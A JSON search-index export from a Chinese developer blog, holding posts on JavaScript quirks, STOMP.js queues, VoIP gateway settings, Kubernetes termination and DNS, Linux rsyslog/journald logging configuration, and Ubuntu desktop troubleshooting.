-https://www.rabbitmq.com/queues.html\n","permalink":"https://wdd.js.org/fe/stompjs-set-queue-name/","summary":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html","title":"stompjs 使用x-queue-name指定队列名"},{"content":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using the ToString abstract operation. Leading whitespace in this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toString()方法转换之后发现是字符串5e-7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 
对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","permalink":"https://wdd.js.org/fe/parseint-with-little-number/","summary":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using the ToString abstract operation. Leading whitespace in this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toString()方法转换之后发现是字符串5e-7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 
对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","title":"parseInt(0.0000005)为什么等于5?"},{"content":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?\n","permalink":"https://wdd.js.org/fe/js-object-create/","summary":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?","title":"{} Object.create({}) Object.create(null)的区别?"},{"content":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配置了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edit your SFB Profile -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。\n","permalink":"https://wdd.js.org/opensips/ch7/rtp-broken-connection/","summary":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 
Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配置了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edit your SFB Profile -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。","title":"奥科网关 Rtp Broken Connection"},{"content":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.\nIn this episode of “Kubernetes Best Practices,” let’s take a look at how you can help Kubernetes do its job more efficiently and reduce the downtime your applications experience.\nIn the pre-container world, most applications ran on VMs or physical machines. If an application crashed, it took quite a while to boot up a replacement. 
If you only had one or two machines to run the application, this kind of time-to-recovery was unacceptable.\nInstead, it became common to use process-level monitoring to restart applications when they crashed. If the application crashed, the monitoring process could capture the exit code and instantly restart the application.\nWith the advent of systems like Kubernetes, process monitoring systems are no longer necessary, as Kubernetes handles restarting crashed applications itself. Kubernetes uses an event loop to make sure that resources such as containers and nodes are healthy. This means you no longer need to manually run these monitoring processes. If a resource fails a health check, Kubernetes automatically spins up a replacement.\nThe Kubernetes termination lifecycle Kubernetes does a lot more than monitor your application for crashes. It can create more copies of your application to run on multiple machines, update your application, and even run multiple versions of your application at the same time! This means there are many reasons why Kubernetes might terminate a perfectly healthy container. If you update your deployment with a rolling update, Kubernetes slowly terminates old pods while spinning up new ones. If you drain a node, Kubernetes terminates all pods on that node. If a node runs out of resources, Kubernetes terminates pods to free those resources (check out this previous post to learn more about resources).\nIt’s important that your application handle termination gracefully so that there is minimal impact on the end user and the time-to-recovery is as fast as possible!\nIn practice, this means your application needs to handle the SIGTERM message and begin shutting down when it receives it. This means saving all data that needs to be saved, closing down network connections, finishing any work that is left, and other similar tasks.\nOnce Kubernetes has decided to terminate your pod, a series of events takes place. 
Let’s look at each step of the Kubernetes termination lifecycle.\n1 - Pod is set to the “Terminating” State and removed from the endpoints list of all Services At this point, the pod stops getting new traffic. Containers running in the pod will not be affected. 2 - preStop Hook is executed The preStop Hook is a special command or http request that is sent to the containers in the pod. If your application doesn’t gracefully shut down when receiving a SIGTERM you can use this hook to trigger a graceful shutdown. Most programs gracefully shut down when receiving a SIGTERM, but if you are using third-party code or are managing a system you don’t have control over, the preStop hook is a great way to trigger a graceful shutdown without modifying the application.\n3 - SIGTERM signal is sent to the pod At this point, Kubernetes will send a SIGTERM signal to the containers in the pod. This signal lets the containers know that they are going to be shut down soon. Your code should listen for this event and start shutting down cleanly at this point. This may include stopping any long-lived connections (like a database connection or WebSocket stream), saving the current state, or anything like that.\nEven if you are using the preStop hook, it is important that you test what happens to your application if you send it a SIGTERM signal, so you are not surprised in production!\n4 - Kubernetes waits for a grace period At this point, Kubernetes waits for a specified time called the termination grace period. By default, this is 30 seconds. It’s important to note that this happens in parallel to the preStop hook and the SIGTERM signal. Kubernetes does not wait for the preStop hook to finish. If your app finishes shutting down and exits before the terminationGracePeriod is done, Kubernetes moves to the next step immediately.\nIf your pod usually takes longer than 30 seconds to shut down, make sure you increase the grace period. 
You can do that by setting the terminationGracePeriodSeconds option in the Pod YAML. For example, to change it to 60 seconds:\n5 - SIGKILL signal is sent to pod, and the pod is removed If the containers are still running after the grace period, they are sent the SIGKILL signal and forcibly removed. At this point, all Kubernetes objects are cleaned up as well.\nConclusion Kubernetes can terminate pods for a variety of reasons, and making sure your application handles these terminations gracefully is core to creating a stable system and providing a great user experience.\nkubectl explain deployment.spec.template.spec KIND: Deployment VERSION: apps/v1 FIELD: terminationGracePeriodSeconds \u0026lt;integer\u0026gt; DESCRIPTION: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. 1. 参考 https://stackoverflow.com/questions/35453792/pods-stuck-in-terminating-status ","permalink":"https://wdd.js.org/container/terminating-with-grace/","summary":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. 
On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.","title":"优雅停止的pod"},{"content":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolv.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolv.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\n而实际上,这个IP地址就是kube-dns的地址。\n[root@kube-m ~]# kubectl get service -n kube-system -o wide NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR kube-dns ClusterIP 10.254.10.20 \u0026lt;none\u0026gt; 53/UDP,53/TCP 15d k8s-app=kube-dns 而k8s-app=kube-dns这个label可以选中coredns\n[root@kube-m ~]# kubectl get pod -l k8s-app=kube-dns -nkube-system NAME READY STATUS RESTARTS AGE coredns-79f9c855c5-nrk88 1/1 Running 0 15d coredns-79f9c855c5-x75rq 1/1 Running 0 5h45m ","permalink":"https://wdd.js.org/container/k8s-network/","summary":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. 
pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolv.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolv.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.kube-system.svc.cluster.local. 而实际上,这个IP地址就是kube-dns的地址。\n[root@kube-m ~]# kubectl get service -n kube-system -o wide NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR kube-dns ClusterIP 10.254.10.20 \u0026lt;none\u0026gt; 53/UDP,53/TCP 15d k8s-app=kube-dns 而k8s-app=kube-dns这个label可以选中coredns\n[root@kube-m ~]# kubectl get pod -l k8s-app=kube-dns -nkube-system NAME READY STATUS RESTARTS AGE coredns-79f9c855c5-nrk88 1/1 Running 0 15d coredns-79f9c855c5-x75rq 1/1 Running 0 5h45m ","permalink":"https://wdd.js.org/container/k8s-network/","summary":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolv.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolv.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.","title":"K8s pod node网络"},{"content":" 1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23). 
日志等级:debug (7), info (6), notice (5), warning (4), err (3), crit (2), alert (1), and emerg (0). 正则 = 指定某个级别 ! 排除某个级别 匹配所有级别 Example: kern.* #选择所有的内核信息 mail.crit #选择所有优先级高于等于crit cron.!info # 选择cron日志不是info级别的日志 5.2.2. 属性过滤 模式::PROPERTY, [!]COMPARE_OPERATION, \u0026ldquo;STRING\u0026rdquo; **\n比较操作符(COMPARE_OPERATION) contains 包含 isequal 相等 startswith 以xxx开头 regex 正则匹配 ** 举个比较常见的例子.\n如果日志中包含 wdd 这个字符串,就把日志写到/var/log/wdd.log 这个文件里。\n首先编辑一下/etc/rsyslog.conf 文件\n注意 :msg 表示消息的内容 详情可以参考 man rsyslog.conf 关于Available Properties的部分内容\n:msg,contains,\u0026#34;wdd\u0026#34; /var/log/wdd.log 保存退出,然后执行下面的命令:\ntouch /var/log/wdd.log # 创建文件 systemctl restart rsyslog # 重启服务 logger hello wdd ➜ log tail /var/log/wdd.log May 23 19:26:52 VM_0_8_centos root: hello wdd 5.2.3. Action 将rsyslog写日志文件:\n# 方式1:过滤器 日志路径 cron.* /var/log/cron.log # 方式2:过滤器\t-日志路径。注意多了个- # 默认rsyslog是同步写日志,加个-表示异步写日志。在写日志比较多时候,异步的写可以提高性能 mail.* -/var/log/cron.log # 方式3:通过网络发送日志 # @[(zNUMBER)]HOST:[PORT] zNUMBER是压缩等级 mail.* @192.168.2.3:8000 #通过UDP发送日志 cron.* @@192.168.2.3:8000 #通过TCP发送日志, 注意多了一个@ *.* @(2)192.168.2.3:8000 #通过UDP发送日志,日志会被压缩后发送,压缩等级是2。日志如果少于60字节,将不会压缩 5.2.4. 丢弃日志 cron.* stop *.* ~ # rsyslog8 支持用~丢弃日志 详情可以:man rsyslog.conf\n5.2.5. 日志回滚 man logrotate 里面有很多例子\n/var/log/wdd.log { noolddir size 10M rotate 10 sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 6. 速度限制 6.1. journald的速度限制 RateLimitInterval 限速周期,默认30s RateLimitBurst 限速值, 默认限速值1000 针对单个service, 在一个限速周期内,如果消息量超过限速值,则丢弃本周期内的所有消息。\n/etc/systemd/journald.conf\n#RateLimitInterval=30s #RateLimitBurst=1000 如果想关闭速度限制,就将RateLimitInterval设置为0\nRateLimitInterval=, RateLimitBurst= Configures the rate limiting that is applied to all messages generated on the system. 
If, in the time interval defined by RateLimitInterval=, more messages than specified in RateLimitBurst= are logged by a service, all further messages within the interval are dropped until the interval is over. A message about the number of dropped messages is generated. This rate limiting is applied per-service, so that two services which log do not interfere with each other\u0026rsquo;s limits. Defaults to 1000 messages in 30s. The time specification for RateLimitInterval= may be specified in the following units: \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;ms\u0026rdquo;, \u0026ldquo;us\u0026rdquo;. To turn off any kind of rate\nlimiting, set either value to 0.\n6.2. rsyslog的速度限制 /etc/rsyslog.conf\n$SystemLogRateLimitInterval 2 # 单位是s $SystemLogRateLimitBurst 50 如果要关闭速度限制,就将SystemLogRateLimitInterval设置为0\n7. journal 日志清理 \u0026ndash;vacuum-size=, \u0026ndash;vacuum-time= Removes archived journal files until the disk space they use falls below the specified size (specified with the usual \u0026ldquo;K\u0026rdquo;, \u0026ldquo;M\u0026rdquo;, \u0026ldquo;G\u0026rdquo;, \u0026ldquo;T\u0026rdquo;\nsuffixes), or all journal files contain no data older than the specified timespan (specified with the usual \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;days\u0026rdquo;,\n\u0026ldquo;months\u0026rdquo;, \u0026ldquo;weeks\u0026rdquo;, \u0026ldquo;years\u0026rdquo; suffixes). Note that running \u0026ndash;vacuum-size= has only indirect effect on the output shown by \u0026ndash;disk-usage as\nthe latter includes active journal files, while the former only operates on archived journal files. \u0026ndash;vacuum-size= and \u0026ndash;vacuum-time=\nmay be combined in a single invocation to enforce both a size and time limit on the archived journal files.\n发现 /var/log/journal的目录居然有4G。\n所以需要清理。\n7.1. 
手动清理 journalctl --vacuum-time=2d # 保留最近两天 journalctl --vacuum-size=500M # 保留最近500MB 按天执行一次试试:\njournalctl --vacuum-time=2d Vacuuming done, freed 3.9G of archived journals on disk. 7.2. 修改配置 为了避免以后还需要手动清理,可以修改/etc/systemd/journald.conf文件\n例如将最大使用改为200M\nSystemMaxUse=200M 重启journald: systemctl restart systemd-journald 8. linux 日志文件简介 linux的日志位于/var/log目录下。\n日志主要分为4类\n1 应用日志 2 事件日志 3 服务日志 4 系统日志 日志内容\n/var/log/messages 普通应用级别活动 /var/log/auth.log 用户验证相关事件 /var/log/secure 系统授权 /var/log/boot.log 系统启动日志 /var/log/dmesg.log 硬件设备相关 /var/log/kern.log 内核日志 /var/log/faillog 失败的登录尝试日志 /var/log/cron crontab计划任务日志 /var/log/yum.log 包安装日志 /var/log/maillog /var/log/mail.log 邮件服务相关日志 /var/log/httpd/ Apache web服务器日志 /var/log/mysql.log /var/log/mysqld.log mysql相关日志 ","permalink":"https://wdd.js.org/posts/2022/10/linux-journal/","summary":"1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23).","title":"Linux 日志系统简述"},{"content":"1. 
ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关心网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序去显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。\neog output.png 7. build-requirements: libtool not found. apt-get update apt-get install -y libtool-bin 8. ubuntu下解压zip文件出现中文乱码 相信大家在使用Ubuntu等linux系统时经常会遇到解压压缩文件出现乱码。 zip的处理方式主要有以下两种\n一、unzip 解压时-O指定字符编码\nunzip -O GBK xxxx.zip 注:解压很复杂的中文文件名如果报错,用引号括起来即可\n二、unar\nunar xxx.zip 注:这种方式要先保证系统中有安装unar,若没有使用如下命令安装: sudo apt-get install unar\n9. 放弃ubuntu的GUI 选择linux的原因无非是丰富的开发软件包,各种各样的效率工具,而不是因为漂亮的GUI。\n我使用ubuntu大概已经有几个月了,说说一些使用体会。\n聊天软件: 微信、QQ等工具,目前只有wine版,使用体验会稍微比mac和window有些差,但是基本是可用。 输入法:搜狗输入法,基本上和win和mac没有什么差别 文档: wps 基本上和win和mac没有区别 浏览器: chrome, firefox体验始终丝滑 编辑器:neovim 畅享丝滑 各种开发工具:git, docker, oh my zsh tmux 等等, 这些天然就是linux下面的工具 总体来说,如果没有最近遇到的两个严重问题,我会一直用ubuntu下开发的。\nxorg经常cpu很高,导致界面卡死,出现频率很高,查了很多资料,依然无法解决。只能通过restart gdm3去重启。 有时候xorg cpu不算高,也查不出高cpu的进程,但是整个界面还是卡死 卡死的这个问题真的非常影响开发效率。\n所以我决定关闭ubuntu的图形界面,通过ssh远程连接,在上面做开发\n10. 
ubuntu 终端还是图形界面 ubuntu boot最后阶段,进入到登录提示。\n这里有两个选择\n图形界面 tty终端 具体是进入哪种显示方式,是由配置决定。但是默认的是图形界面。\n# 终端启动 systemctl set-default multi-user.target # 图形界面启动 systemctl set-default graphical.target 设置之后reboot 11. 如何从GUI进入到终端模式呢? 某些时候,ubuntu图形界面卡死,无法交互。如何进入终端模式使用top命令看看什么在占用CPU呢?\n有以下快捷键可以从GUI切换到tty\nCtrl + alt + f1 Ctrl + alt + f2 Ctrl + alt + f3 Ctrl + alt + f4 Ctrl + alt + f5 Ctrl + alt + f6 上面的快捷键都可以进入终端,如果一个不行,就用另一个试试。注意 ctrl alt f功能键 要同时按下去。\n我之前就遇到过,图形界面卡死,无法操作。然后进入终端模式,使用top命令,看到xorg占用了接近100%的CPU.\n然后输入下面的命令来重启gdm来解决的\nsudo systemctl restart gdm 12. 什么是GDM? GDM是gnome display manager的缩写。\n# 查看gonme版本号 gnome-shell --version 常见的gdm有\ngdm3 lightdm ssdm 通过查看/etc/X11/default-display-manager可以查看系统使用的gdm具体是哪个\n➜ ~ cat /etc/X11/default-display-manager /usr/sbin/gdm3 也可以通过下面的方式查看 systemctl status display-manager # 可以通过下面的方式安装不同的gdm sudo apt install lightdm sudo apt install sddm # 通过dpkg-reconfigure 可以来配置使用不同的GDM sudo dpkg-reconfigure gdm3 sudo dpkg-reconfigure lightdm sudo dpkg-reconfigure sddm 13. ubuntu截图软件flameshot apt install flameshot 14. 生命不息 折腾不止 使用ubuntu作为主力开发工具 最初,我花了6年时间在windows上学习、娱乐、编码\n后来我花了4年时间转切换到macbook pro上开发\n现在,我切换到ubuntu上开发。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华\n才学会什么是效率,什么是专一。\n蓦然回首\n这10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n内心深处彷佛有人在说,你为什么要改变呢? 